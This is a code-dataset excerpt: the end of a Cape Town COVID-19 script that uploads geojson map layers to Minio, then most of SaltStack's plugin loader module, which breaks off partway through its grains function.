indices\n remapped_delta_gdf.index.name = \"dummy_index\"\n\n logging.info(f\"Remapp[ed] cases for '{layer_filename}'\")\n\n logging.info(\"Normalis[ing] data\")\n normalised_gdf = normalise_gdf(remapped_delta_gdf)\n logging.info(\"Normalis[ed] data\")\n\n logging.info(f\"Writ[ing] geojson for '{layer_filename}'\")\n count_layer_values = write_delta_gdf_to_disk(normalised_gdf, tempdir, layer_filename)\n map_layers_dict[layer_filename] = count_layer_values\n logging.info(f\"Wr[ote] geojson for '{layer_filename}'\")\n\n logging.info(\"Writ[ing] layers to Minio\")\n del map_layers_dict[CT_VODACOM_POLYGONS]\n city_map_layers_to_minio.write_layers_to_minio(map_layers_dict,\n secrets[\"minio\"][\"edge\"][\"access\"],\n secrets[\"minio\"][\"edge\"][\"secret\"])\n logging.info(\"Wr[ote] layers to Minio\")\n","repo_name":"cityofcapetown/covid-19-widgets","sub_path":"mobile_data_map_layers_to_minio.py","file_name":"mobile_data_map_layers_to_minio.py","file_ext":"py","file_size_in_byte":13546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12846387564","text":"\"\"\"\nThe Salt loader is the core to Salt's plugin system, the loader scans\ndirectories for python loadable code and organizes the code into the\nplugin interfaces used by Salt.\n\"\"\"\n\nimport contextlib\nimport inspect\nimport logging\nimport os\nimport re\nimport time\nimport types\n\nimport salt.config\nimport salt.defaults.events\nimport salt.defaults.exitcodes\nimport salt.loader.context\nimport salt.syspaths\nimport salt.utils.context\nimport salt.utils.data\nimport salt.utils.dictupdate\nimport salt.utils.event\nimport salt.utils.files\nimport salt.utils.lazy\nimport salt.utils.odict\nimport salt.utils.platform\nimport salt.utils.stringutils\nimport salt.utils.versions\nfrom salt.exceptions import LoaderError\nfrom salt.template import check_render_pipe_str\nfrom salt.utils import entrypoints\n\nfrom .lazy import SALT_BASE_PATH, FilterDictWrapper, LazyLoader\n\nlog = logging.getLogger(__name__)\n\n# Because on the cloud drivers we do `from salt.cloud.libcloudfuncs import *`\n# which simplifies code readability, it adds some unsupported functions into\n# the driver's module scope.\n# We list un-supported functions here. These will be removed from the loaded.\n# TODO: remove the need for this cross-module code. 
Maybe use NotImplemented\nLIBCLOUD_FUNCS_NOT_SUPPORTED = (\n \"parallels.avail_sizes\",\n \"parallels.avail_locations\",\n \"proxmox.avail_sizes\",\n)\n\nSALT_INTERNAL_LOADERS_PATHS = (\n str(SALT_BASE_PATH / \"auth\"),\n str(SALT_BASE_PATH / \"beacons\"),\n str(SALT_BASE_PATH / \"cache\"),\n str(SALT_BASE_PATH / \"client\" / \"ssh\" / \"wrapper\"),\n str(SALT_BASE_PATH / \"cloud\" / \"clouds\"),\n str(SALT_BASE_PATH / \"engines\"),\n str(SALT_BASE_PATH / \"executors\"),\n str(SALT_BASE_PATH / \"fileserver\"),\n str(SALT_BASE_PATH / \"grains\"),\n str(SALT_BASE_PATH / \"log_handlers\"),\n str(SALT_BASE_PATH / \"matchers\"),\n str(SALT_BASE_PATH / \"metaproxy\"),\n str(SALT_BASE_PATH / \"modules\"),\n str(SALT_BASE_PATH / \"netapi\"),\n str(SALT_BASE_PATH / \"output\"),\n str(SALT_BASE_PATH / \"pillar\"),\n str(SALT_BASE_PATH / \"proxy\"),\n str(SALT_BASE_PATH / \"queues\"),\n str(SALT_BASE_PATH / \"renderers\"),\n str(SALT_BASE_PATH / \"returners\"),\n str(SALT_BASE_PATH / \"roster\"),\n str(SALT_BASE_PATH / \"runners\"),\n str(SALT_BASE_PATH / \"sdb\"),\n str(SALT_BASE_PATH / \"serializers\"),\n str(SALT_BASE_PATH / \"spm\" / \"pkgdb\"),\n str(SALT_BASE_PATH / \"spm\" / \"pkgfiles\"),\n str(SALT_BASE_PATH / \"states\"),\n str(SALT_BASE_PATH / \"thorium\"),\n str(SALT_BASE_PATH / \"tokens\"),\n str(SALT_BASE_PATH / \"tops\"),\n str(SALT_BASE_PATH / \"utils\"),\n str(SALT_BASE_PATH / \"wheel\"),\n)\n\n\ndef static_loader(\n opts,\n ext_type,\n tag,\n pack=None,\n int_type=None,\n ext_dirs=True,\n ext_type_dirs=None,\n base_path=None,\n filter_name=None,\n loaded_base_name=None,\n):\n funcs = LazyLoader(\n _module_dirs(\n opts,\n ext_type,\n tag,\n int_type,\n ext_dirs,\n ext_type_dirs,\n base_path,\n ),\n opts,\n tag=tag,\n pack=pack,\n loaded_base_name=loaded_base_name,\n )\n ret = {}\n funcs._load_all()\n if filter_name:\n funcs = FilterDictWrapper(funcs, filter_name)\n for key in funcs:\n ret[key] = funcs[key]\n return ret\n\n\ndef _module_dirs(\n opts,\n ext_type,\n tag=None,\n int_type=None,\n ext_dirs=True,\n ext_type_dirs=None,\n base_path=None,\n load_extensions=True,\n):\n if tag is None:\n tag = ext_type\n sys_types = os.path.join(base_path or str(SALT_BASE_PATH), int_type or ext_type)\n return_types = [sys_types]\n if opts.get(\"extension_modules\"):\n ext_types = os.path.join(opts[\"extension_modules\"], ext_type)\n return_types.insert(0, ext_types)\n\n if not sys_types.startswith(SALT_INTERNAL_LOADERS_PATHS):\n raise RuntimeError(\n \"{!r} is not considered a salt internal loader path. 
If this \"\n \"is a new loader being added, please also add it to \"\n \"{}.SALT_INTERNAL_LOADERS_PATHS.\".format(sys_types, __name__)\n )\n\n ext_type_types = []\n if ext_dirs:\n if ext_type_dirs is None:\n ext_type_dirs = f\"{tag}_dirs\"\n if ext_type_dirs in opts:\n ext_type_types.extend(opts[ext_type_dirs])\n if ext_type_dirs and load_extensions is True:\n for entry_point in entrypoints.iter_entry_points(\"salt.loader\"):\n with catch_entry_points_exception(entry_point) as ctx:\n loaded_entry_point = entry_point.load()\n if ctx.exception_caught:\n continue\n\n # Old way of defining loader entry points\n # [options.entry_points]\n # salt.loader=\n # runner_dirs = thirpartypackage.loader:func_to_get_list_of_dirs\n # module_dirs = thirpartypackage.loader:func_to_get_list_of_dirs\n #\n #\n # New way of defining entrypoints\n # [options.entry_points]\n # salt.loader=\n # = thirpartypackage\n # = thirpartypackage:callable\n #\n # We try and see if the thirpartypackage has a `ext_type` sub module, and if so,\n # we append it to loaded_entry_point_paths.\n # If the entry-point is in the form of `thirpartypackage:callable`, the return of that\n # callable must be a dictionary where the keys are the `ext_type`'s and the values must be\n # lists of paths.\n\n # We could feed the paths we load directly to `ext_type_types`, but we would not\n # check for duplicates\n loaded_entry_point_paths = set()\n\n if isinstance(loaded_entry_point, types.FunctionType):\n # If the entry point object is a function, we have two scenarios\n # 1: It returns a list; This is an old style entry entry_point\n # 2: It returns a dictionary; This is a new style entry point\n with catch_entry_points_exception(entry_point) as ctx:\n loaded_entry_point_value = loaded_entry_point()\n if ctx.exception_caught:\n continue\n\n if isinstance(loaded_entry_point_value, dict):\n # This is new style entry-point and it returns a dictionary.\n # It MUST contain `ext_type` in it's keys to be considered\n if ext_type not in loaded_entry_point_value:\n continue\n with catch_entry_points_exception(entry_point) as ctx:\n if isinstance(loaded_entry_point_value[ext_type], str):\n # No strings please!\n raise ValueError(\n \"The callable must return an iterable of strings. 
\"\n \"A single string is not supported.\"\n )\n for path in loaded_entry_point_value[ext_type]:\n loaded_entry_point_paths.add(path)\n else:\n # This is old style entry-point, and, as such, the entry point name MUST\n # match the value of `ext_type_dirs\n if entry_point.name != ext_type_dirs:\n continue\n for path in loaded_entry_point_value:\n loaded_entry_point_paths.add(path)\n elif isinstance(loaded_entry_point, types.ModuleType):\n # This is a new style entry points definition which just points us to a package\n #\n # We try and see if the thirpartypackage has a `ext_type` sub module, and if so,\n # we append it to loaded_entry_point_paths.\n for loaded_entry_point_path in loaded_entry_point.__path__:\n with catch_entry_points_exception(entry_point) as ctx:\n entry_point_ext_type_package_path = os.path.join(\n loaded_entry_point_path, ext_type\n )\n if not os.path.exists(entry_point_ext_type_package_path):\n continue\n if ctx.exception_caught:\n continue\n loaded_entry_point_paths.add(entry_point_ext_type_package_path)\n else:\n with catch_entry_points_exception(entry_point):\n raise ValueError(\n \"Don't know how to load a salt extension from {}\".format(\n loaded_entry_point\n )\n )\n\n # Finally, we check all paths that we collected to see if they exist\n for path in loaded_entry_point_paths:\n if os.path.exists(path):\n ext_type_types.append(path)\n\n cli_module_dirs = []\n # The dirs can be any module dir, or a in-tree _{ext_type} dir\n for _dir in opts.get(\"module_dirs\", []):\n # Prepend to the list to match cli argument ordering\n maybe_dir = os.path.join(_dir, ext_type)\n if os.path.isdir(maybe_dir):\n cli_module_dirs.insert(0, maybe_dir)\n continue\n\n maybe_dir = os.path.join(_dir, f\"_{ext_type}\")\n if os.path.isdir(maybe_dir):\n cli_module_dirs.insert(0, maybe_dir)\n\n return cli_module_dirs + ext_type_types + return_types\n\n\ndef minion_mods(\n opts,\n context=None,\n utils=None,\n whitelist=None,\n initial_load=False,\n loaded_base_name=None,\n notify=False,\n static_modules=None,\n proxy=None,\n file_client=None,\n):\n \"\"\"\n Load execution modules\n\n Returns a dictionary of execution modules appropriate for the current\n system by evaluating the __virtual__() function in each module.\n\n :param dict opts: The Salt options dictionary\n\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n\n :param dict utils: Utility functions which should be made available to\n Salt modules in __utils__. See `utils_dirs` in\n salt.config for additional information about\n configuration.\n\n :param list whitelist: A list of modules which should be whitelisted.\n :param bool initial_load: Deprecated flag! Unused.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :param bool notify: Flag indicating that an event should be fired upon\n completion of module loading.\n\n\n Example:\n\n .. 
code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n __grains__ = salt.loader.grains(__opts__)\n __opts__['grains'] = __grains__\n __utils__ = salt.loader.utils(__opts__)\n __salt__ = salt.loader.minion_mods(__opts__, utils=__utils__)\n __salt__['test.ping']()\n \"\"\"\n # TODO Publish documentation for module whitelisting\n if not whitelist:\n whitelist = opts.get(\"whitelist_modules\", None)\n ret = LazyLoader(\n _module_dirs(opts, \"modules\", \"module\"),\n opts,\n tag=\"module\",\n pack={\n \"__context__\": context,\n \"__utils__\": utils,\n \"__proxy__\": proxy,\n \"__opts__\": opts,\n \"__file_client__\": file_client,\n },\n whitelist=whitelist,\n loaded_base_name=loaded_base_name,\n static_modules=static_modules,\n extra_module_dirs=utils.module_dirs if utils else None,\n pack_self=\"__salt__\",\n )\n\n # Load any provider overrides from the configuration file providers option\n # Note: Providers can be pkg, service, user or group - not to be confused\n # with cloud providers.\n providers = opts.get(\"providers\", False)\n if providers and isinstance(providers, dict):\n for mod in providers:\n # sometimes providers opts is not to diverge modules but\n # for other configuration\n try:\n funcs = raw_mod(opts, providers[mod], ret)\n except TypeError:\n break\n else:\n if funcs:\n for func in funcs:\n f_key = \"{}{}\".format(mod, func[func.rindex(\".\") :])\n ret[f_key] = funcs[func]\n\n if notify:\n with salt.utils.event.get_event(\"minion\", opts=opts, listen=False) as evt:\n evt.fire_event(\n {\"complete\": True}, tag=salt.defaults.events.MINION_MOD_REFRESH_COMPLETE\n )\n\n return ret\n\n\ndef raw_mod(opts, name, functions, mod=\"modules\", loaded_base_name=None):\n \"\"\"\n Returns a single module loaded raw and bypassing the __virtual__ function\n\n :param dict opts: The Salt options dictionary\n :param str name: The name of the module to load\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param str mod: The extension type.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n\n Example:\n\n .. 
code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n testmod = salt.loader.raw_mod(__opts__, 'test', None)\n testmod['test.ping']()\n \"\"\"\n loader = LazyLoader(\n _module_dirs(opts, mod, \"module\"),\n opts,\n tag=\"rawmodule\",\n virtual_enable=False,\n pack={\"__salt__\": functions},\n loaded_base_name=loaded_base_name,\n )\n # if we don't have the module, return an empty dict\n if name not in loader.file_mapping:\n return {}\n\n # load a single module (the one passed in)\n loader._load_module(name)\n # return a copy of *just* the funcs for `name`\n return dict({x: loader[x] for x in loader._dict})\n\n\ndef metaproxy(opts, loaded_base_name=None):\n \"\"\"\n Return functions used in the meta proxy\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"metaproxy\"),\n opts,\n tag=\"metaproxy\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef matchers(opts, loaded_base_name=None):\n \"\"\"\n Return the matcher services plugins\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"matchers\"),\n opts,\n tag=\"matchers\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef engines(opts, functions, runners, utils, proxy=None, loaded_base_name=None):\n \"\"\"\n Return the engines plugins\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader runners: A LazyLoader instance returned from ``runner``.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n pack = {\n \"__salt__\": functions,\n \"__runners__\": runners,\n \"__proxy__\": proxy,\n \"__utils__\": utils,\n }\n return LazyLoader(\n _module_dirs(opts, \"engines\"),\n opts,\n tag=\"engines\",\n pack=pack,\n extra_module_dirs=utils.module_dirs if utils else None,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef proxy(\n opts,\n functions=None,\n returners=None,\n whitelist=None,\n utils=None,\n context=None,\n pack_self=\"__proxy__\",\n loaded_base_name=None,\n):\n \"\"\"\n Returns the proxy module for this salt-proxy-minion\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader returners: A LazyLoader instance returned from ``returners``.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"proxy\"),\n opts,\n tag=\"proxy\",\n pack={\n \"__salt__\": functions,\n \"__ret__\": returners,\n \"__utils__\": utils,\n \"__context__\": context,\n },\n extra_module_dirs=utils.module_dirs if utils else None,\n pack_self=pack_self,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef returners(\n opts, functions, whitelist=None, context=None, proxy=None, loaded_base_name=None\n):\n \"\"\"\n Returns the returner 
modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param list whitelist: A list of modules which should be whitelisted.\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"returners\", \"returner\"),\n opts,\n tag=\"returner\",\n whitelist=whitelist,\n pack={\"__salt__\": functions, \"__context__\": context, \"__proxy__\": proxy or {}},\n loaded_base_name=loaded_base_name,\n )\n\n\ndef utils(\n opts,\n whitelist=None,\n context=None,\n proxy=None,\n pack_self=None,\n loaded_base_name=None,\n):\n \"\"\"\n Returns the utility modules\n\n :param dict opts: The Salt options dictionary\n :param list whitelist: A list of modules which should be whitelisted.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"utils\", ext_type_dirs=\"utils_dirs\", load_extensions=False),\n opts,\n tag=\"utils\",\n whitelist=whitelist,\n pack={\"__context__\": context, \"__proxy__\": proxy or {}},\n pack_self=pack_self,\n loaded_base_name=loaded_base_name,\n _only_pack_properly_namespaced_functions=False,\n )\n\n\ndef pillars(opts, functions, context=None, loaded_base_name=None):\n \"\"\"\n Returns the pillars modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n _utils = utils(opts)\n ret = LazyLoader(\n _module_dirs(opts, \"pillar\"),\n opts,\n tag=\"pillar\",\n pack={\"__salt__\": functions, \"__context__\": context, \"__utils__\": _utils},\n extra_module_dirs=_utils.module_dirs,\n pack_self=\"__ext_pillar__\",\n loaded_base_name=loaded_base_name,\n )\n return FilterDictWrapper(ret, \".ext_pillar\")\n\n\ndef tops(opts, loaded_base_name=None):\n \"\"\"\n Returns the tops modules\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if \"master_tops\" not in opts:\n return {}\n whitelist = list(opts[\"master_tops\"].keys())\n ret = LazyLoader(\n _module_dirs(opts, \"tops\", \"top\"),\n opts,\n tag=\"top\",\n whitelist=whitelist,\n loaded_base_name=loaded_base_name,\n )\n return FilterDictWrapper(ret, \".top\")\n\n\ndef wheels(opts, whitelist=None, context=None, loaded_base_name=None):\n \"\"\"\n Returns the wheels modules\n\n :param dict opts: The Salt options dictionary\n :param list whitelist: A list of modules which should be whitelisted.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if context is None:\n context = {}\n return LazyLoader(\n _module_dirs(opts, \"wheel\"),\n 
opts,\n tag=\"wheel\",\n whitelist=whitelist,\n pack={\"__context__\": context},\n loaded_base_name=loaded_base_name,\n )\n\n\ndef outputters(opts, loaded_base_name=None):\n \"\"\"\n Returns the outputters modules\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :returns: LazyLoader instance, with only outputters present in the keyspace\n \"\"\"\n ret = LazyLoader(\n _module_dirs(opts, \"output\", ext_type_dirs=\"outputter_dirs\"),\n opts,\n tag=\"output\",\n loaded_base_name=loaded_base_name,\n )\n wrapped_ret = FilterDictWrapper(ret, \".output\")\n # TODO: this name seems terrible... __salt__ should always be execution mods\n ret.pack[\"__salt__\"] = wrapped_ret\n return wrapped_ret\n\n\ndef serializers(opts, loaded_base_name=None):\n \"\"\"\n Returns the serializers modules\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :returns: LazyLoader instance, with only serializers present in the keyspace\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"serializers\"),\n opts,\n tag=\"serializers\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef eauth_tokens(opts, loaded_base_name=None):\n \"\"\"\n Returns the tokens modules\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :returns: LazyLoader instance, with only token backends present in the keyspace\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"tokens\"),\n opts,\n tag=\"tokens\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef auth(opts, whitelist=None, loaded_base_name=None):\n \"\"\"\n Returns the auth modules\n\n :param dict opts: The Salt options dictionary\n\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param list whitelist: A list of modules which should be whitelisted.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n :returns: LazyLoader\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"auth\"),\n opts,\n tag=\"auth\",\n whitelist=whitelist,\n pack={\"__salt__\": minion_mods(opts)},\n loaded_base_name=loaded_base_name,\n )\n\n\ndef fileserver(opts, backends, loaded_base_name=None):\n \"\"\"\n Returns the file server modules\n\n :param dict opts: The Salt options dictionary\n :param list backends: List of backends to load.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n _utils = utils(opts)\n\n if backends is not None:\n if not isinstance(backends, list):\n backends = [backends]\n\n # If backend is a VCS, add both the '-fs' and non '-fs' versions to the list.\n # Use a set to keep them unique\n backend_set = set()\n vcs_re = re.compile(\"^(git|svn|hg)(?:fs)?$\")\n for backend in backends:\n match = vcs_re.match(backend)\n if match:\n backend_set.add(match.group(1))\n backend_set.add(match.group(1) + \"fs\")\n else:\n backend_set.add(backend)\n backends = list(backend_set)\n\n return LazyLoader(\n _module_dirs(opts, \"fileserver\"),\n opts,\n tag=\"fileserver\",\n whitelist=backends,\n pack={\"__utils__\": _utils},\n extra_module_dirs=_utils.module_dirs,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef roster(opts, runner=None, utils=None, whitelist=None, loaded_base_name=None):\n \"\"\"\n Returns the roster modules\n\n :param dict opts: The Salt options dictionary\n :param 
LazyLoader runner: A LazyLoader instance returned from ``runner``.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param list whitelist: A list of modules which should be whitelisted.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"roster\"),\n opts,\n tag=\"roster\",\n whitelist=whitelist,\n pack={\"__runner__\": runner, \"__utils__\": utils},\n extra_module_dirs=utils.module_dirs if utils else None,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef thorium(opts, functions, runners, loaded_base_name=None):\n \"\"\"\n Load the thorium runtime modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader runners: A LazyLoader instance returned from ``runner``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n pack = {\"__salt__\": functions, \"__runner__\": runners, \"__context__\": {}}\n ret = LazyLoader(\n _module_dirs(opts, \"thorium\"),\n opts,\n tag=\"thorium\",\n pack=pack,\n loaded_base_name=loaded_base_name,\n )\n ret.pack[\"__thorium__\"] = ret\n return ret\n\n\ndef states(\n opts,\n functions,\n utils,\n serializers,\n whitelist=None,\n proxy=None,\n context=None,\n loaded_base_name=None,\n file_client=None,\n):\n \"\"\"\n Returns the state modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader runners: A LazyLoader instance returned from ``runner``.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param LazyLoader serializers: An optional LazyLoader instance returned from ``serializers``.\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param list whitelist: A list of modules which should be whitelisted.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n\n .. 
code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n statemods = salt.loader.states(__opts__, None, None)\n \"\"\"\n if context is None:\n context = {}\n\n return LazyLoader(\n _module_dirs(opts, \"states\"),\n opts,\n tag=\"states\",\n pack={\n \"__salt__\": functions,\n \"__proxy__\": proxy or {},\n \"__utils__\": utils,\n \"__serializers__\": serializers,\n \"__context__\": context,\n \"__file_client__\": file_client,\n },\n whitelist=whitelist,\n extra_module_dirs=utils.module_dirs if utils else None,\n pack_self=\"__states__\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef beacons(opts, functions, context=None, proxy=None, loaded_base_name=None):\n \"\"\"\n Load the beacon modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"beacons\"),\n opts,\n tag=\"beacons\",\n pack={\"__context__\": context, \"__salt__\": functions, \"__proxy__\": proxy or {}},\n virtual_funcs=[],\n loaded_base_name=loaded_base_name,\n )\n\n\ndef log_handlers(opts, loaded_base_name=None):\n \"\"\"\n Returns the custom logging handler modules\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n ret = LazyLoader(\n _module_dirs(\n opts,\n \"log_handlers\",\n ),\n opts,\n tag=\"log_handlers\",\n loaded_base_name=loaded_base_name,\n )\n return FilterDictWrapper(ret, \".setup_handlers\")\n\n\ndef ssh_wrapper(opts, functions=None, context=None, loaded_base_name=None):\n \"\"\"\n Returns the custom logging handler modules\n\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(\n opts,\n \"wrapper\",\n base_path=str(SALT_BASE_PATH / \"client\" / \"ssh\"),\n ),\n opts,\n tag=\"wrapper\",\n pack={\"__salt__\": functions, \"__context__\": context},\n loaded_base_name=loaded_base_name,\n )\n\n\ndef render(\n opts, functions, states=None, proxy=None, context=None, loaded_base_name=None\n):\n \"\"\"\n Returns the render modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader states: A LazyLoader instance returned from ``states``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if context is None:\n context = {}\n\n pack = {\n \"__salt__\": functions,\n \"__grains__\": opts.get(\"grains\", {}),\n \"__context__\": context,\n }\n\n if states:\n pack[\"__states__\"] = states\n\n if proxy is None:\n proxy = {}\n pack[\"__proxy__\"] = proxy\n\n ret = LazyLoader(\n _module_dirs(\n opts,\n 
\"renderers\",\n \"render\",\n ext_type_dirs=\"render_dirs\",\n ),\n opts,\n tag=\"render\",\n pack=pack,\n loaded_base_name=loaded_base_name,\n )\n rend = FilterDictWrapper(ret, \".render\")\n\n if not check_render_pipe_str(\n opts[\"renderer\"], rend, opts[\"renderer_blacklist\"], opts[\"renderer_whitelist\"]\n ):\n err = (\n \"The renderer {} is unavailable, this error is often because \"\n \"the needed software is unavailable\".format(opts[\"renderer\"])\n )\n log.critical(err)\n raise LoaderError(err)\n return rend\n\n\ndef grain_funcs(opts, proxy=None, context=None, loaded_base_name=None):\n \"\"\"\n Returns the grain functions\n\n :param dict opts: The Salt options dictionary\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n\n .. code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n grainfuncs = salt.loader.grain_funcs(__opts__)\n \"\"\"\n _utils = utils(opts, proxy=proxy)\n pack = {\"__utils__\": utils(opts, proxy=proxy), \"__context__\": context}\n ret = LazyLoader(\n _module_dirs(\n opts,\n \"grains\",\n \"grain\",\n ext_type_dirs=\"grains_dirs\",\n ),\n opts,\n tag=\"grains\",\n extra_module_dirs=_utils.module_dirs,\n pack=pack,\n loaded_base_name=loaded_base_name,\n )\n ret.pack[\"__utils__\"] = _utils\n return ret\n\n\ndef _format_cached_grains(cached_grains):\n \"\"\"\n Returns cached grains with fixed types, like tuples.\n \"\"\"\n if cached_grains.get(\"osrelease_info\"):\n osrelease_info = cached_grains[\"osrelease_info\"]\n if isinstance(osrelease_info, list):\n cached_grains[\"osrelease_info\"] = tuple(osrelease_info)\n return cached_grains\n\n\ndef _load_cached_grains(opts, cfn):\n \"\"\"\n Returns the grains cached in cfn, or None if the cache is too old or is\n corrupted.\n \"\"\"\n if not os.path.isfile(cfn):\n log.debug(\"Grains cache file does not exist.\")\n return None\n\n grains_cache_age = int(time.time() - os.path.getmtime(cfn))\n if grains_cache_age > opts.get(\"grains_cache_expiration\", 300):\n log.debug(\n \"Grains cache last modified %s seconds ago and cache \"\n \"expiration is set to %s. Grains cache expired. \"\n \"Refreshing.\",\n grains_cache_age,\n opts.get(\"grains_cache_expiration\", 300),\n )\n return None\n\n if opts.get(\"refresh_grains_cache\", False):\n log.debug(\"refresh_grains_cache requested, Refreshing.\")\n return None\n\n log.debug(\"Retrieving grains from cache\")\n try:\n with salt.utils.files.fopen(cfn, \"rb\") as fp_:\n cached_grains = salt.utils.data.decode(\n salt.payload.load(fp_), preserve_tuples=True\n )\n if not cached_grains:\n log.debug(\"Cached grains are empty, cache might be corrupted. 
Refreshing.\")\n return None\n\n return _format_cached_grains(cached_grains)\n except OSError:\n return None\n\n\ndef grains(opts, force_refresh=False, proxy=None, context=None, loaded_base_name=None):\n \"\"\"\n Return the functions for the dynamic grains and the values for the static\n grains.\n\n :param dict opts: The Salt options dictionary\n :param bool force_refresh: Force the refresh of grains\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n\n Since grains are computed early in the startup process, grains functions\n do not have __salt__ or __proxy__ available. At proxy-minion startup,\n this function is called with the proxymodule LazyLoader object so grains\n functions can communicate with their controlled device.\n\n .. code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n __grains__ = salt.loader.grains(__opts__)\n print __grains__['id']\n \"\"\"\n # Need to re-import salt.config, somehow it got lost when a minion is starting\n import salt.config\n\n # if we have no grains, lets try loading from disk (TODO: move to decorator?)\n cfn = os.path.join(opts[\"cachedir\"], 